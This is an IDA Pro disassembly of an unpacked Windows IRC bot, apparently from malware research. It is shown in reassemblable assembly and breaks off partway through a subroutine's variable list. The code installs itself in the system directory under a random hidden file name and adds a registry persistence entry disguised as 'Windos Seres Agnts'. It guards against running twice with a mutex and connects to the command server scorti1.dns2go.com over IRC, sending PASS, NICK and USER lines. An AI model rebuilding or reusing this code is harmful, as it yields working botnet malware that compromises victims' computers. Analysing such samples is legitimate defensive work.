;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6B16FF7747E8E2F9A3F5F0AABEA8B394
; File Name : u:\work\6b16ff7747e8e2f9a3f5f0aabea8b394_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00025B34 ( 154420.)
; Section size in file : 00025B34 ( 154420.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401221+358�p
; sub_4188A6+1E�p
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
loc_401005: ; DATA XREF: start+1C�o
push esi
push edi
mov edi, offset dword_429050
xor esi, esi
mov ebx, offset aWindosSeresAgn ; "Windos Seres Agnts"
loc_401013: ; CODE XREF: sub_401000+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_4CB988 ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40104D
push [ebp+arg_0]
call sub_41B9C0
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_4CB9F8 ; RegSetValueExA
jmp short loc_401057
; ---------------------------------------------------------------------------
loc_40104D: ; CODE XREF: sub_401000+2F�j
push ebx
push [ebp+var_4]
call dword_4CB938 ; RegDeleteValueA
loc_401057: ; CODE XREF: sub_401000+4B�j
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
add edi, 8
cmp edi, offset dword_429068
jb short loc_401013
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401070 proc near ; CODE XREF: sub_4010AB+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4010A5
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_401089: ; CODE XREF: sub_401070+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_427220[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_401089
pop edi
pop ebx
loc_4010A5: ; CODE XREF: sub_401070+E�j
mov eax, esi
pop esi
not eax
retn
sub_401070 endp
; =============== S U B R O U T I N E =======================================
sub_4010AB proc near ; CODE XREF: sub_4167A0+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_41BEB5
mov [esp+10h+var_10], offset dword_429068
push [esp+10h+arg_0]
mov esi, eax
call sub_41BEA2
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4010FA
loc_4010D0: ; CODE XREF: sub_4010AB+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4010FE
inc ebx
push ebx
push esi
call sub_41BBE2
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4010FA
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_41BAFA
add esp, 10h
jmp short loc_4010D0
; ---------------------------------------------------------------------------
loc_4010FA: ; CODE XREF: sub_4010AB+23�j
; sub_4010AB+39�j
xor eax, eax
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_4010FE: ; CODE XREF: sub_4010AB+29�j
dec ebx
push ebx
push esi
call sub_401070
push esi
mov ebx, eax
call sub_41BA91
push edi
call sub_41BA3B
add esp, 10h
mov eax, ebx
loc_401119: ; CODE XREF: sub_4010AB+51�j
pop edi
pop esi
pop ebx
retn
sub_4010AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40111D proc near ; DATA XREF: sub_401221+14�o
var_268 = dword ptr -268h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43E91C
call dword_4CBA6C ; closesocket
call sub_40B583
call dword_4CB92C ; WSACleanup
call dword_4CB92C ; WSACleanup
mov ebx, ds:dword_427080
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41BF70
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_41BF70
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_43DB88
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_427074 ; CreateProcessA
test eax, eax
jz short loc_4011E2
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:dword_427070
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4011E2: ; CODE XREF: sub_40111D+AF�j
; DATA XREF: sub_4DE2D7+101�r
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_43DB80
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_42706C ; ExitProcess
pop edi
pop esi
pop ebx
loc_401205: ; DATA XREF: .data:00429004�o
jmp $+5
push 0FFFFh
push 539h
call sub_418BD1
pop ecx
mov dword_4CB710, eax
pop ecx
retn
sub_40111D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401221 proc near ; CODE XREF: .text:0041E29C�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_6F4 = byte ptr -6F4h
var_5F4 = byte ptr -5F4h
var_4F0 = byte ptr -4F0h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_1E8 = byte ptr -1E8h
var_E4 = dword ptr -0E4h
var_D8 = dword ptr -0D8h
var_B8 = dword ptr -0B8h
var_B4 = word ptr -0B4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_40111D
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_4270B0
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4CB714, eax
call esi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_409909
push 2
call dword_4CBA80 ; SetErrorMode
push 7530h
push offset aSbrti ; "sbrti"
push ebx
push ebx
call ds:dword_4270AC ; CreateMutexA
push eax
call ds:dword_4270A8 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_4012A1
push 1
call ds:dword_42706C ; ExitProcess
loc_4012A1: ; CODE XREF: sub_401221+76�j
lea eax, [ebp+var_884]
push eax
push 202h
call dword_4CB944 ; WSAStartup
cmp eax, ebx
jnz loc_4017E4
cmp [ebp+var_884], 2
jnz loc_4017DE
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_4017DE
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call ds:dword_4270A4 ; GetModuleHandleA
push eax
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push ebx
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_41C3B1
add esp, 14h
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_5F4]
push esi
push eax
call sub_41C360
lea eax, [ebp+var_3F0]
push eax
lea eax, [ebp+var_2EC]
push eax
loc_40134E: ; DATA XREF: sub_4DE2D7+26F�r
call sub_41C2E0
add esp, 1Ch
test eax, eax
jnz loc_401516
cmp dword_42908C, ebx
mov esi, offset aQunapfgq_exe ; "qunapfgq.exe"
jz short loc_40139C
push esi
xor edi, edi
call sub_41B9C0
sub eax, 4
pop ecx
jz short loc_40139C
loc_401379: ; CODE XREF: sub_401221+179�j
call sub_41C2C2
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte ptr aQunapfgq_exe[edi], dl ; "qunapfgq.exe"
inc edi
call sub_41B9C0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_401379
loc_40139C: ; CODE XREF: sub_401221+148�j
; sub_401221+156�j
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_41C266
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call ds:dword_4270A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4013DC
lea eax, [ebp+var_1E8]
push 80h
push eax
call ds:dword_42709C ; SetFileAttributesA
loc_4013DC: ; CODE XREF: sub_401221+1A7�j
mov esi, ds:dword_427098
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
xor edi, edi
push eax
loc_4013F3: ; CODE XREF: sub_401221+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_40142C
call ds:dword_427094 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40142C
cmp eax, 20h
jz short loc_40140D
cmp eax, 5
jnz short loc_40142C
loc_40140D: ; CODE XREF: sub_401221+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_427080 ; Sleep
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
jmp short loc_4013F3
; ---------------------------------------------------------------------------
loc_40142C: ; CODE XREF: sub_401221+1D6�j
; sub_401221+1E0�j ...
lea eax, [ebp+var_1E8]
push eax
call sub_4187E0
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call ds:dword_42709C ; SetFileAttributesA
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_41BF70
push 44h
lea eax, [ebp+var_E4]
pop esi
push esi
push ebx
push eax
call sub_41BF70
add esp, 18h
mov [ebp+var_E4], esi
mov [ebp+var_D8], offset byte_43DB88
mov [ebp+var_B4], bx
push 1
pop esi
mov [ebp+var_B8], esi
loc_401488: ; DATA XREF: sub_4DE2D7+8C�w
; .sxdata:004DEA53�r
call ds:dword_427090 ; GetCurrentProcessId
push eax
push esi
push 100000h
loc_401495: ; DATA XREF: .data:off_433094�o
call ds:dword_42708C ; OpenProcess
lea ecx, [ebp+var_2EC]
push ecx
push eax
lea eax, [ebp+var_1E8]
loc_4014A9: ; DATA XREF: sub_4DE2D7+A1�r
push eax
lea eax, [ebp+var_988]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_41C266
add esp, 14h
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_E4]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call ds:dword_427074 ; CreateProcessA
test eax, eax
jz short loc_401516
push 0C8h
call ds:dword_427080 ; Sleep
push [ebp+var_20]
mov esi, ds:dword_427070
call esi ; CloseHandle
push [ebp+var_1C]
call esi ; CloseHandle
call dword_4CB92C ; WSACleanup
push ebx
call ds:dword_42706C ; ExitProcess
loc_401516: ; CODE XREF: sub_401221+137�j
; sub_401221+2CB�j
cmp dword_4DBDF8, 2
jle short loc_401562
mov eax, dword_4DBDFC
push dword ptr [eax+4]
call sub_41C159
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4270A8 ; WaitForSingleObject
push esi
call ds:dword_427070 ; CloseHandle
mov eax, dword_4DBDFC
cmp [eax+8], ebx
jz short loc_401562
push 7D0h
call ds:dword_427080 ; Sleep
mov eax, dword_4DBDFC
push dword ptr [eax+8]
call ds:dword_427088 ; DeleteFileA
loc_401562: ; CODE XREF: sub_401221+2FC�j
; sub_401221+326�j
cmp dword_429090, ebx
jz short loc_40157F
cmp dword_4CBAA4, ebx
jnz short loc_40157F
lea eax, [ebp+var_5F4]
push eax
call sub_401000
pop ecx
loc_40157F: ; CODE XREF: sub_401221+347�j
; sub_401221+34F�j
lea eax, [ebp+var_A0]
push offset dword_429A98
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_40B3BA
lea eax, [ebp+var_A0]
push eax
call sub_415D38
push 0B80h
push ebx
push offset dword_43DB90
call sub_41BF70
add esp, 24h
lea eax, [ebp+var_A0]
push offset unk_429A74
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_A0]
push 1
push eax
call sub_40B3BA
add esp, 14h
mov esi, eax
mov edi, ds:dword_427084
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_419F4D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E924[esi], eax
jnz short loc_401622
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A0]
push offset unk_429A34
push eax
call sub_41C266
add esp, 0Ch
loc_401622: ; CODE XREF: sub_401221+3E4�j
lea eax, [ebp+var_A0]
push eax
call sub_415D38
push 2
call sub_40B602
pop ecx
test eax, eax
pop ecx
jnz short loc_4016A7
lea eax, [ebp+var_A0]
push offset dword_429A08
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40B3BA
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_410BFD
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E924[esi], eax
jnz short loc_40169A
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A0]
push offset dword_4299D4
push eax
call sub_41C266
add esp, 0Ch
loc_40169A: ; CODE XREF: sub_401221+45C�j
lea eax, [ebp+var_A0]
push eax
call sub_415D38
pop ecx
loc_4016A7: ; CODE XREF: sub_401221+418�j
call sub_41C2C2
push 7Fh
and eax, 3
push offset aScorti1_dns2go ; "scorti1.dns2go.com"
push offset dword_4CB71C
mov dword_4CB888, eax
call sub_41BFD0
mov eax, dword_42906C
push 3Fh
mov edi, offset dword_4CB79C
push offset aFaak ; "#FAAK#"
push edi
mov dword_4CB86C, eax
call sub_41BFD0
push 3Fh
mov esi, offset dword_4CB7DC
push offset aSaad_ ; "saad."
push esi
call sub_41BFD0
add esp, 24h
mov dword_4CB870, ebx
loc_4016FC: ; CODE XREF: sub_401221+563�j
; sub_401221+56E�j ...
mov [ebp+var_4], ebx
loc_4016FF: ; CODE XREF: sub_401221+517�j
push offset dword_4CB718
mov dword_4CB884, ebx
call sub_4017ED
cmp eax, 2
mov [ebp+var_10], eax
jz loc_4017D9
cmp dword_4CB884, ebx
jz short loc_401726
dec [ebp+var_4]
loc_401726: ; CODE XREF: sub_401221+500�j
push 0BB8h
call ds:dword_427080 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4016FF
cmp [ebp+var_10], 2
jz loc_4017D9
cmp [ebp+var_C], ebx
jz short loc_401789
push 7Fh
push offset aScorti1_dns2go ; "scorti1.dns2go.com"
push offset dword_4CB71C
call sub_41BFD0
mov eax, dword_42906C
push 3Fh
push offset aFaak ; "#FAAK#"
push edi
mov dword_4CB86C, eax
call sub_41BFD0
push 3Fh
push offset aSaad_ ; "saad."
push esi
call sub_41BFD0
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_4016FC
; ---------------------------------------------------------------------------
loc_401789: ; CODE XREF: sub_401221+526�j
; DATA XREF: .sxdata:004DE550�o
cmp byte_4290E4, bl
jz loc_4016FC
push 7Fh
push offset byte_4290E4
push offset dword_4CB71C
call sub_41BFD0
mov eax, dword_429070
push 3Fh
push offset aFaak_0 ; "#FAAK#"
push edi
mov dword_4CB86C, eax
call sub_41BFD0
push 3Fh
push offset aSaad__0 ; "saad."
push esi
call sub_41BFD0
add esp, 24h
mov [ebp+var_C], 1
jmp loc_4016FC
; ---------------------------------------------------------------------------
loc_4017D9: ; CODE XREF: sub_401221+4F4�j
; sub_401221+51D�j
call sub_40B583
loc_4017DE: ; CODE XREF: sub_401221+A1�j
; sub_401221+B1�j
call dword_4CB92C ; WSACleanup
loc_4017E4: ; CODE XREF: sub_401221+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_401221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017ED proc near ; CODE XREF: sub_401221+4E9�p
; DATA XREF: sub_401ACD+654C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_401812: ; CODE XREF: sub_4017ED+E6�j
; sub_4017ED+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call dword_4CB9D4 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40A8F0
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40193F
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_41BF70
push 0
lea eax, [ebp+var_2C]
push dword_4290A0
push dword_42909C
push eax
call sub_40AE84
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_43E928
push edi
push eax
call sub_41BFD0
add esp, 28h
push 6
push 1
push 2
call dword_4CBA54 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_43E91C[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4018D8
push esi
call dword_4CBA6C ; closesocket
call sub_40A919
push 7D0h
loc_4018CD: ; CODE XREF: sub_4017ED+146�j
call ds:dword_427080 ; Sleep
jmp loc_401812
; ---------------------------------------------------------------------------
loc_4018D8: ; CODE XREF: sub_4017ED+CD�j
lea eax, [ebp+var_18C]
push eax
push offset unk_429AD0
call sub_415DAC
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_401955
add esp, 28h
mov edi, eax
push esi
call dword_4CBA6C ; closesocket
test edi, edi
jz loc_401812
cmp edi, 1
jnz short loc_401935
push 0DBBA0h
jmp short loc_4018CD
; ---------------------------------------------------------------------------
loc_401935: ; CODE XREF: sub_4017ED+13F�j
cmp edi, 2
jz short loc_401943
jmp loc_401812
; ---------------------------------------------------------------------------
loc_40193F: ; CODE XREF: sub_4017ED+5A�j
xor eax, eax
jmp short loc_40194F
; ---------------------------------------------------------------------------
loc_401943: ; CODE XREF: sub_4017ED+14B�j
push [ebp+var_34]
call sub_40B6D6
pop ecx
push 2
pop eax
loc_40194F: ; CODE XREF: sub_4017ED+154�j
pop edi
pop esi
leave
retn 4
sub_4017ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401955 proc near ; CODE XREF: sub_4017ED+123�p
var_1A90 = byte ptr -1A90h
var_A90 = byte ptr -0A90h
var_2C0 = byte ptr -2C0h
var_140 = byte ptr -140h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A90h
call sub_41C500
push ebx
push esi
push edi
xor ebx, ebx
push 3
mov [ebp+var_8], ebx
lea eax, [ebp+var_2C0]
pop ecx
loc_401973: ; CODE XREF: sub_401955+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_401973
cmp byte_4CB880, bl
jz short loc_40199A
push offset byte_4CB880
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
loc_401992: ; DATA XREF: .sxdata:004DED8D�r
call sub_409823
add esp, 0Ch
loc_40199A: ; CODE XREF: sub_401955+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_40AE84
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_41C266
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401A04
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push 1388h
call ds:dword_427080 ; Sleep
loc_4019FD: ; CODE XREF: sub_401955+D9�j
; sub_401955+153�j
xor eax, eax
loc_4019FF: ; CODE XREF: sub_401955+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401A04: ; CODE XREF: sub_401955+92�j
; sub_401955+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A90]
push esi
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1A90]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
test eax, eax
jle short loc_4019FD
lea eax, [ebp+var_A90]
push eax
lea eax, [ebp+var_1A90]
push eax
call sub_4184CC
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_401A04
lea edi, [ebp+var_A90]
loc_401A55: ; CODE XREF: sub_401955+165�j
push 1
pop esi
loc_401A58: ; CODE XREF: sub_401955+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_2C0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_401ACD
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_401A9B
push 7D0h
call ds:dword_427080 ; Sleep
jmp short loc_401A58
; ---------------------------------------------------------------------------
loc_401A9B: ; CODE XREF: sub_401955+137�j
cmp esi, 0FFFFFFFDh
jz short loc_401AC5
cmp esi, 0FFFFFFFEh
jz short loc_401AC1
cmp esi, 0FFFFFFFFh
jz loc_4019FD
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_401A55
jmp loc_401A04
; ---------------------------------------------------------------------------
loc_401AC1: ; CODE XREF: sub_401955+14E�j
push 1
jmp short loc_401AC7
; ---------------------------------------------------------------------------
loc_401AC5: ; CODE XREF: sub_401955+149�j
push 2
loc_401AC7: ; CODE XREF: sub_401955+16E�j
pop eax
jmp loc_4019FF
sub_401955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401ACD proc near ; CODE XREF: sub_401955+12A�p
var_568C = byte ptr -568Ch
var_528C = byte ptr -528Ch
var_50FC = byte ptr -50FCh
var_4FF8 = byte ptr -4FF8h
var_4EF8 = byte ptr -4EF8h
var_4CF8 = byte ptr -4CF8h
var_4BF8 = byte ptr -4BF8h
var_4AF4 = byte ptr -4AF4h
var_49F4 = byte ptr -49F4h
var_48F0 = byte ptr -48F0h
var_47F0 = byte ptr -47F0h
var_46F0 = byte ptr -46F0h
var_45F0 = byte ptr -45F0h
var_458C = byte ptr -458Ch
var_448C = byte ptr -448Ch
var_438C = byte ptr -438Ch
var_428C = byte ptr -428Ch
var_408C = byte ptr -408Ch
var_3F8C = dword ptr -3F8Ch
var_3F88 = byte ptr -3F88h
var_3F08 = byte ptr -3F08h
var_3E04 = byte ptr -3E04h
var_3D00 = dword ptr -3D00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = dword ptr -3CF8h
var_3CF4 = dword ptr -3CF4h
var_3CF0 = dword ptr -3CF0h
var_3CEC = dword ptr -3CECh
var_3CE8 = byte ptr -3CE8h
var_3C68 = byte ptr -3C68h
var_3BE8 = byte ptr -3BE8h
var_3B68 = byte ptr -3B68h
var_3AE8 = byte ptr -3AE8h
var_3A68 = dword ptr -3A68h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = dword ptr -3A5Ch
var_3A58 = byte ptr -3A58h
var_37D1 = byte ptr -37D1h
var_37D0 = byte ptr -37D0h
var_36CC = dword ptr -36CCh
var_36C4 = dword ptr -36C4h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B8 = dword ptr -36B8h
var_36B0 = dword ptr -36B0h
var_36AC = dword ptr -36ACh
var_36A8 = byte ptr -36A8h
var_3628 = byte ptr -3628h
var_35A8 = byte ptr -35A8h
var_3528 = byte ptr -3528h
var_34A8 = dword ptr -34A8h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = dword ptr -3498h
var_3494 = byte ptr -3494h
var_3414 = byte ptr -3414h
var_3394 = byte ptr -3394h
var_3314 = byte ptr -3314h
var_3294 = dword ptr -3294h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = dword ptr -3284h
var_3280 = byte ptr -3280h
var_3200 = byte ptr -3200h
var_3180 = byte ptr -3180h
var_3100 = byte ptr -3100h
var_3080 = dword ptr -3080h
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = dword ptr -3070h
var_306C = byte ptr -306Ch
var_2FEC = byte ptr -2FECh
var_2F6C = byte ptr -2F6Ch
var_2EEC = byte ptr -2EECh
var_2E6C = dword ptr -2E6Ch
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = dword ptr -2E60h
var_2E5C = byte ptr -2E5Ch
var_2D58 = dword ptr -2D58h
var_2D54 = byte ptr -2D54h
var_2C50 = byte ptr -2C50h
var_2B4C = dword ptr -2B4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = dword ptr -2B44h
var_2B40 = byte ptr -2B40h
var_2AC0 = dword ptr -2AC0h
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB4 = dword ptr -2AB4h
var_2AAC = byte ptr -2AACh
var_2994 = byte ptr -2994h
var_2914 = dword ptr -2914h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = dword ptr -2900h
var_28FC = byte ptr -28FCh
var_287C = byte ptr -287Ch
var_277C = byte ptr -277Ch
var_267C = dword ptr -267Ch
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = dword ptr -2658h
var_2654 = byte ptr -2654h
var_25D4 = byte ptr -25D4h
var_24D4 = byte ptr -24D4h
var_23D4 = dword ptr -23D4h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = dword ptr -23B0h
var_23AC = byte ptr -23ACh
var_232C = byte ptr -232Ch
var_22AC = byte ptr -22ACh
var_222C = dword ptr -222Ch
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
